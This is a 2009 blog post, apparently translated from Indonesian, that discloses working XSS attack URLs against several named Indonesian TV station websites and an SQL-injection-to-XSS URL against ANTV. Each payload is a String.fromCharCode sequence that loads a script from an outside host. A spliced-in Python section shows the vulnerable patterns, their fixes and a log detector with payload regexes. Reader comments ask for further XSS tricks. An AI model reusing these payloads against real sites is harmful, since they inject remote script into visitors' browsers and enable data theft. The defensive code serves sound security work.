Here we’re going to show you XSS (Cross-Site Scripting) and XFS (XSS From SQLi) bugs on some Indonesian TV station websites.
As you might already know, cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites accounted for roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end user, who may be subject to unauthorized access, theft of sensitive data, and financial loss (taken from Wikipedia).
Here are some examples of their vulnerable URLs:
= TransTV =
http://transtv.co.id/200706/sinopsispers.asp (Patched)
http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E
= SCTV =
http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E
= Indosiar =
http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
= GlobalTV =
http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E
= TVRI =
http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E
= ANTV =
This is the worst among them: their site is vulnerable to both XSS and SQL injection. But since this post is only about XSS, we will only show you the XFS (XSS From SQLi) on their site:
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-
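The two bug classes above, reflected XSS in a search parameter and XSS reached through a UNION-based SQL injection, come down to the same two mistakes: user input is pasted into SQL, and database or request values are pasted into HTML. The following is an added example written for this post (it is not code from the original post or from any of the listed sites, which run ASP/PHP; the toy `shows` table, the function names and the sample access log lines are all constructed here). It shows each vulnerable pattern next to its fix, and a small detector a webmaster could run over access logs to spot the payload shapes used in the URLs above.

```python
"""Added example (not code from the original post or from any listed site).

  1. Reflected XSS: a search term reflected into HTML without encoding,
     and the fix (context-aware output encoding).
  2. XSS from SQL injection ("XFS"): string-built SQL lets a UNION SELECT
     char(...) return an attacker-chosen string that is then rendered as
     HTML; bound parameters plus output encoding close that path.
  3. Detection: flag access-log requests containing String.fromCharCode(...)
     or UNION SELECT char(...) once percent-encoding is undone.
"""
import html
import re
import sqlite3
import urllib.parse

# --- 1. Reflected XSS in a search page -------------------------------------

def render_search_vulnerable(term: str) -> str:
    # The bug: the user-supplied term is concatenated straight into HTML.
    return f"<p>Results for: {term}</p>"

def render_search_fixed(term: str) -> str:
    # The fix: encode for the HTML text context before reflecting it.
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"

# --- 2. XSS from SQL injection ("XFS") --------------------------------------

def setup_db() -> sqlite3.Connection:
    # Constructed toy table standing in for a real "programme" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shows (sid INTEGER, title TEXT)")
    conn.execute("INSERT INTO shows VALUES (1, 'Evening News')")
    return conn

def show_title_vulnerable(conn: sqlite3.Connection, sid: str) -> str:
    # The bug: string-built SQL. A 'null union select char(...)' value makes
    # the query return any string the attacker likes, rendered unencoded.
    row = conn.execute(f"SELECT title FROM shows WHERE sid={sid}").fetchone()
    return f"<h1>{row[0] if row else 'not found'}</h1>"

def show_title_fixed(conn: sqlite3.Connection, sid: str) -> str:
    # The fix: validate the type, bind the value (no SQL structure from user
    # input), and encode on output so even a crafted DB value stays inert.
    try:
        sid_int = int(sid)
    except ValueError:
        return "<h1>not found</h1>"
    row = conn.execute("SELECT title FROM shows WHERE sid=?", (sid_int,)).fetchone()
    return f"<h1>{html.escape(row[0]) if row else 'not found'}</h1>"

# --- 3. Detection over access logs -----------------------------------------

# Constructed sample log lines (not from the post or from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2009:03:14:00 +0700] "GET /search.php?s=berita HTTP/1.1" 200 512
203.0.113.7 - - [30/Aug/2009:03:15:10 +0700] "GET /search.php?s=%3Cscript%3Edocument.write(String.fromCharCode(60,115))%3C/script%3E HTTP/1.1" 200 700
203.0.113.9 - - [30/Aug/2009:03:16:22 +0700] "GET /s/?sid=null+union+select+char%2860%29,0-- HTTP/1.1" 200 640
"""

PAYLOAD_PATTERNS = [
    ("xss_fromcharcode", re.compile(r"string\.fromcharcode\s*\(", re.I)),
    ("xss_script_tag",   re.compile(r"<\s*script", re.I)),
    ("sqli_union_char",  re.compile(r"union\s+(all\s+)?select\s+char\s*\(", re.I)),
]

def flag_requests(log_text: str) -> list:
    """Return (client_ip, tags) for each line whose decoded request path
    matches one of the payload patterns."""
    hits = []
    for line in log_text.splitlines():
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
        if not m:
            continue
        ip, path = m.groups()
        # Undo percent-encoding and '+' so encoded payloads are not missed.
        decoded = urllib.parse.unquote_plus(path)
        tags = [name for name, rx in PAYLOAD_PATTERNS if rx.search(decoded)]
        if tags:
            hits.append((ip, tags))
    return hits

if __name__ == "__main__":
    db = setup_db()
    inj = "null union select char(60,115,99,114,105,112,116,62)"
    print(render_search_vulnerable("<script>x</script>"))
    print(render_search_fixed("<script>x</script>"))
    print(show_title_vulnerable(db, inj))   # renders "<script>" from the DB
    print(show_title_fixed(db, inj))        # "not found"
    for ip, tags in flag_requests(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

The detector decodes the path before matching, which is the point of the `String.fromCharCode` trick in the original URLs: the payload is already a number list, and on top of that the whole thing is percent-encoded, so a filter matching the raw log line for `<script` sees nothing. The fix side deliberately does both input validation and output encoding; either alone would have left one of the two pages above exploitable.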
Let’s make Indonesian sites better.
August 30th, 2009 at 3:14 AM
Hopefully the webmasters of the sites concerned know about this.
September 1st, 2009 at 4:07 AM
Cool… nice.
petramax^^
September 3rd, 2009 at 3:10 PM
Bro Joy is really awesome...
hahahaha
September 8th, 2009 at 3:18 PM
Weits, UNBELIEVABLE, I ♥ Mr. Joy
September 10th, 2009 at 11:11 PM
Mr. Joy, I want to know the latest XSS in FS comments, huhu. Thanks a lot, can you get through it? he
Off-topic? Why did your FS get suspended, bro? huhu
September 10th, 2009 at 11:54 PM
Bro, how do you make a website like this…
It’s really nice…
September 12th, 2009 at 3:43 PM
@rio
My profile was suspended because of the no_one widget v2; I’m more into FB now.
Comment linker? Sorry to say that, for our safety, whether it’s available or not, there’s no more comment linker in public. Ah yes,
@heri
This one is based on WordPress, bro Heri, it just needs some tweaking..
November 25th, 2009 at 7:40 AM
Awesome, bro..
Please teach me the FB one. ahhahaa.
You already have my email. heheh.